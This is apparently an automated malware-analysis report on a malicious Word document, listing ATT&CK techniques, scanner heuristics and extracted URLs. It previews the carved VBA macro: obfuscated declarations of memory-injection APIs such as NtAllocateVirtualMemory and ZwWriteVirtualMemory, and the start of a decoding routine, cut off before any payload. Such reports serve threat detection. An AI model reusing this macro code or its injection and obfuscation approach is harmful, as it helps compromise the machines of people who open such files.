Verdict: MALICIOUS
Risk Score: 62

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample contains VBA macros with an auto-execute function (Document_Open) that uses Shell to execute commands. This indicates the macro is designed to run arbitrary code, likely to download and execute a secondary payload. The specific functions called (e.g., ZwWriteVirtualMemory, NtAllocateVirtualMemory) suggest memory manipulation, often used for payload injection or evasion.
Heuristics (3)
- VBA macros detected (medium; 1 related finding): OLE_VBA_MACROS: Document contains VBA macro code.
- VBA p-code auto-exec with execution tokens (high): OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info): EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OLE body):
  - http://www.iec.ch
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef#
  - http://ns.adobe.com/photoshop/1.0/
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8650 bytes | 14d28837f0e4a3d2c0ac383d204c3a9767920d655983cbca0e84b807a68d7f2c |

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "antiphonary"
#If 4 + 1 > 3 And Win64 > 1 - 1 Then
Public Declare PtrSafe Function megaloblastic Lib "Kernel32" Alias "CreateTimerQueueTimer" (circumfluent As Any, ByVal cloyingly As Any, ByVal awakening As Any, ByVal fula As Any, ByVal consciousness As Any, ByVal redrimmed As Any, ByVal ovate As Any) As Long
Public Declare PtrSafe Function meanderingly Lib "Ntdll.dll " Alias _
    "ZwWriteVirtualMemory" (ByVal guinde As Any, ByVal atticus As Any, ByVal drypis As Any, ByVal anergy As Any, ByVal segnity As Any) As LongPtr
Public Declare PtrSafe Function androgenic Lib "ntdll.dll" Alias "NtDeleteAtom" (twentyfourth As LongPtr)
Public Declare PtrSafe Function causeless Lib "ntdll.dll" Alias "NtContinue" (amerge As LongPtr, deceleration As LongPtr, subject As LongPtr) As LongPtr
Public Declare PtrSafe Function exculpate Lib "ntdll.dll " Alias "NtAllocateVirtualMemory" (anthoceropsida As LongPtr, charinile As LongPtr, ByVal tenet As LongPtr, equivocateByVal As LongPtr, interloper As LongPtr, ByVal below As LongPtr) As LongPtr
Public Declare PtrSafe Function lc Lib "Kernel32.dll" Alias "CreateEventW" (ByVal arguable As LongPtr, chamaeleontidae As LongPtr, altorivievo As LongPtr, appressed As LongPtr, hemiplegic As LongPtr) As Long
Public Declare PtrSafe Function ingratitude Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (hyla As LongPtr, anarhichas As Any, coquillage As LongPtr, beanball As Any) As Boolean
Public Declare PtrSafe Function woodfrog Lib "Shlwapi.dll" Alias "PathFileExists" (redet As LongPtr) As LongPtr
#Else
Public Declare Function megaloblastic Lib "Kernel32" Alias "CreateTimerQueueTimer" (antisemite As Any, ByVal clubroom As Any, ByVal bib As Any, ByVal largehearted As Any, ByVal galoche As Any, ByVal cowbarn As Any, ByVal crossstitch As Any) As Long
Public Declare Function shipowner Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (barbital As Long, lombard As Any, hatpin As Long, neomys As Any) As Boolean
Public Declare Function nebulously Lib "Shlwapi.dll" Alias "PathFileExists" (nicaraguan As Long) As Long
Public Declare Function exculpate Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (anacyclus As Long, scatological As Long, ByVal ble As Long, asbestosisByVal As Long, unthrifty As Long, ByVal semidiameter As Long) As Long
Public Declare Function saprolegnia Lib "ntdll.dll" Alias "NtContinue" (chamaedaphne As Long, anaphasic As Long, faroese As Long) As Long
Public Declare Function phasmida Lib "Kernel32.dll" Alias "CreateEventW" (ByVal boutez As Long, ow As Long, dorp As Long, doesn As Long, genera As Long) As Long
Public Declare Function brickyard Lib "ntdll.dll" Alias "NtDeleteAtom" (maintopsail As Long)
Public Declare Function meanderingly Lib "Ntdll.dll " Alias _
    "ZwWriteVirtualMemory" (ByVal steeped As Any, ByVal anticyclone As Any, ByVal defenselessness As Any, ByVal chivalry As Any, ByVal nightstop As Any) As Long
#End If

Function shyness()
    Dim micomicon(255) As Byte
    interferometer = 42 - 112 + 135
    Do
        micomicon(interferometer) = interferometer - 65
        interferometer = interferometer + 1
    Loop While interferometer <= 91
    interferometer = 48
    Do
        micomicon(interferometer) = interferometer + 4
        interferometer = interferometer + 1
    Loop While interferometer <= 58
    interferometer = 97
    Do
        micomicon(interferometer) = interferometer - 71
        interferometer = interferometer + 1
    Loop While interferometer <= 123
    micomicon(47) = 63
    interferometer = 43
    micomicon(interferometer) = 62
    shyness = micomicon
End Function

Function aceldama(thickskull) As String
    mussuk = guar + 75
    guar = Math.Round(138)
    Dim adaptive(6962) As Byte
    Dim colonized As Long
    Dim extra As Integer
    Dim rights As String
    Dim aris(63) As Long
    absento = Rnd(313)
    Dim unmeant As Long
    Dim ... (truncated)
```